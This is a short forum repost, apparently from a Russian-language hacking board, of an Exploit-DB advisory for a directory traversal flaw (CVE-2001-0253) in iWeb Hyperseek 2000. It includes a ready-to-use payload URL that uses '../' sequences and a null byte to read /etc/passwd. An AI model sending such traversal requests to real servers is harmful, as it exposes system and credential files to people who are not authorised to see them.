Exploit iweb hyperseek 2000 - Directory Traversal

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
20601
Проверка EDB
  1. Пройдено
Автор
MC GAN
Тип уязвимости
REMOTE
Платформа
MULTIPLE
CVE
cve-2001-0253
Дата публикации
2001-01-28
Код:
source: https://www.securityfocus.com/bid/2314/info

A specially crafted URL, composed of '../' and '%00', will disclose the directory listing and files of the target with read permissions. 

http://target/cgi-bin/suche/hsx.cgi?show=../../../../../../../etc/passwd%00
 
Источник
www.exploit-db.com

Похожие темы